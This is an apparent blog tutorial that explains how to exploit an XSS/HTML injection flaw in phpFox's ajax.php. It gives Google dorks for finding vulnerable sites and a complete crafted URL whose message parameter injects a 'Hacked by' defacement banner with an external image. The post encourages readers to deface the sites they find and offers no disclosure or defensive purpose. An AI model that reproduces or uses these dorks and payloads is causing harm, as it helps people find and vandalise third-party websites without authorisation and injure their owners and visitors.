PhpFox (ajax.php) XSS Vulnerability





Asalamu alikum Friends Today I am gonna share with you somethething Called phpFox (ajax.php) XSS Vulnerability

Well in this world of social media every one wants to be creative so some people start cloning the Social Media websites with phpFox Script and starts making a new social media websites

But wait u know Security is just an illusion in Hacking world so phpFox is also Vulnerable for XSS

So Lets start

First off all we need dorks to find these websites
HERE ARe Two Dorks in which websites are prone to XSS Attack

  • "intext:© · English (US) Powered By phpFox Version 3.0.1."
  • "inurl:/static/ajax.php?core"


Open any website with search results after that you will get url like below

http://www.examplesite.in/static/ajax.php?core
[ajax]=true&core
[call]=core.message&height=150&width=300&message= <d
iv class="error_message">some message here &core[security_token]=99d754d2b583565369e194e30eaabcbc

- Now, change the error message in red colour with your HTML tags or anything
you want.

http://www.examplesite.in/static/ajax.php?core
[ajax]=true&core
[call]=core.message&height=150&width=300&message=
<center><font
color="red"><h2>Hacked by Malik Ubi</
h2><br><h1>www.examplesite.in</
h1><a href='http://
www.examplesite.in'><img src="http://
i55.tinypic.com/14uuv14.png"/>
&core
[security_token]=99d754d2b583565369e194e30eaabcbc

After applying your Html Tags you will see you deface on page :-D
Enjoy Hope you liked this tutorial
By Malik Ubi
Newer Post Older Post
Post A Comment
  • Blogger Comment using Blogger
  • Facebook Comment using Facebook
  • Disqus Comment using Disqus

No comments :


Subscribe to: Post Comments (Atom)